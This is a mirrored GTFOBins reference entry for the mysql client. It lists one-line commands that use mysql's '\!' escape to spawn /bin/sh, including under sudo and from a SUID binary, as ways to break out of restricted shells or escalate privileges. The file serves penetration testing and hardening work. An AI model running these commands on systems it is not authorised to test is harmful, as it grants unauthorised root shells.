1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/mysql.md

11 lines
214 B
Markdown
Raw Normal View History

---
description: A valid MySQL server must be available.
functions:
2018-10-05 19:55:38 +02:00
shell:
- code: mysql -e '\! /bin/sh'
2018-10-05 19:55:38 +02:00
sudo:
- code: sudo mysql -e '\! /bin/sh'
2018-10-05 19:55:38 +02:00
limited-suid:
- code: ./mysql -e '\! /bin/sh'
---